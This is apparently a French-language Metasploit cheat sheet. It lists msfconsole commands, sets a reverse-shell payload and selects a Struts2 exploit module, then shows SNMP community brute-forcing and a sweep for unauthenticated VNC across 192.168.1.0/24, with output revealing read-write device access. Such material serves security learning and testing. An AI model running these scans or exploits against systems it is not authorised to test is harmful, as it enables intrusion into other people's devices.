Metasploit Framework est une boite à outils qui permet de développer et exécuter des exploits (logiciels permettant d'exploiter à son profit une vulnérabilité) sur une ou plusieurs machines distantes.
L'outil est préinstallé dans la distribution Kali Linux.
kali@kali:~$ sudo msfconsole
msf6 > help
msf6 > show auxiliary
msf6 > show exploits
msf6 > show payloads
msf6 > show encoders
msf6 > show nops
msf6 > show options
msf6 > show targets
msf6 > show options
msf6 > back
msf6 > jobs
msf6 > connect [ip] [port]
Metasploit Framework peut fonctionner avec PostgreSQL dans le but de sauvegarder les scans de ports et de vulnerabilités.
kali@kali:~$ sudo msfconsole
msf6 > msfdb init
msf6 > db_connect -y /usr/share/metasploit-framework/config/database.yml
msf6 > db_status
msf6 > hosts
msf6 > services
msf6 > search name:linux type:exploit
msf6 > grep tcp search name:linux
msf6 > info exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf6 > set payloads payload/linux/x64/shell_reverse_tcp
msf6 > set RHOST kali.shebangthedolphins.net
msf6 > setg RHOST kali.shebangthedolphins.net
msf6 > unset RHOST
msf6 > unsetg RHOST
msf6 > unset all
msf6 > use exploit/multi/http/strsuts2_namespace_ognl
msf6 > db_nmap -T Aggressive -sV -n -O -v kali.shebangthedolphins.net
msf6 > check
msf6 > exploit
msf6 > run
msf6 > grep -i community search snmp 24 auxiliary/scanner/snmp/snmp_login normal No SNMP Community Login Scanner
msf6 > use auxiliary/scanner/snmp/snmp_login
msf6 auxiliary(scanner/snmp/snmp_login) > show options odule options (auxiliary/scanner/snmp/snmp_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm) PASSWORD no The password to test PASS_FILE /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt no File containing communities, one per line RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 161 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads (max one per host) USER_AS_PASS false no Try the username as the password for all users VERBOSE true yes Whether to print output for all attempts VERSION 1 yes The SNMP version to scan (Accepted: 1, 2c, all)
msf6 auxiliary(scanner/snmp/snmp_login) > set RHOSTS 192.168.1.0/24 RHOSTS => 192.168.1.0/24
msf6 auxiliary(scanner/snmp/snmp_login) > set THREADS 254 THREADS => 254
msf6 auxiliary(scanner/snmp/snmp_login) > run [+] SNMP: 192.168.1.2 community string: 'public' info: 'GSM7224 L2 Managed Gigabit Switch' [+] SNMP: 192.168.1.199 community string: 'public' info: 'HP ETHERNET MULTI-ENVIRONMENT' [+] SNMP: 192.168.1.2 community string: 'private' info: 'GSM7224 L2 Managed Gigabit Switch' [+] SNMP: 192.168.1.199 community string: 'private' info: 'HP ETHERNET MULTI-ENVIRONMENT' [*] Validating scan results from 2 hosts... [*] Host 192.168.1.199 provides READ-WRITE access with community 'internal' [*] Host 192.168.1.199 provides READ-WRITE access with community 'private' [*] Host 192.168.1.199 provides READ-WRITE access with community 'public' [*] Host 192.168.1.2 provides READ-WRITE access with community 'private' [*] Host 192.168.1.2 provides READ-ONLY access with community 'public' [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed
Ici nous cherchons des serveurs vnc sans mot de passe dans le réseau 192.168.1.0/24.
msf6 > search vnc_none_auth atching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/vnc/vnc_none_auth normal No VNC Authentication None Detection
msf6 > use auxiliary/scanner/vnc/vnc_none_auth
msf6 auxiliary(scanner/snmp/snmp_login) > show options odule options (auxiliary/scanner/vnc/vnc_none_auth): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 5900 yes The target port (TCP) THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set RHOSTS 192.168.1.0/24 RHOSTS => 192.168.1.0/24
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set THREADS 254 THREADS => 254
msf6 auxiliary(scanner/vnc/vnc_none_auth) > run [*] 192.168.1.143:5900 - 192.168.1.143:5900 - VNC server protocol version: 3.8 [*] 192.168.1.143:5900 - 192.168.1.143:5900 - VNC server security types supported: None [+] 192.168.1.143:5900 - 192.168.1.143:5900 - VNC server security types includes None, free access! [*] 192.168.1.0/24:5900 - Scanned 30 of 256 hosts (11% complete) [*] 192.168.1.0/24:5900 - Scanned 252 of 256 hosts (98% complete) [*] 192.168.1.0/24:5900 - Scanned 252 of 256 hosts (98% complete) [*] 192.168.1.0/24:5900 - Scanned 252 of 256 hosts (98% complete) [*] 192.168.1.0/24:5900 - Scanned 252 of 256 hosts (98% complete) [*] 192.168.1.0/24:5900 - Scanned 252 of 256 hosts (98% complete) [*] 192.168.1.0/24:5900 - Scanned 252 of 256 hosts (98% complete) [*] 192.168.1.0/24:5900 - Scanned 252 of 256 hosts (98% complete) [*] 192.168.1.0/24:5900 - Scanned 253 of 256 hosts (98% complete) [*] 192.168.1.0/24:5900 - Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed
Contact :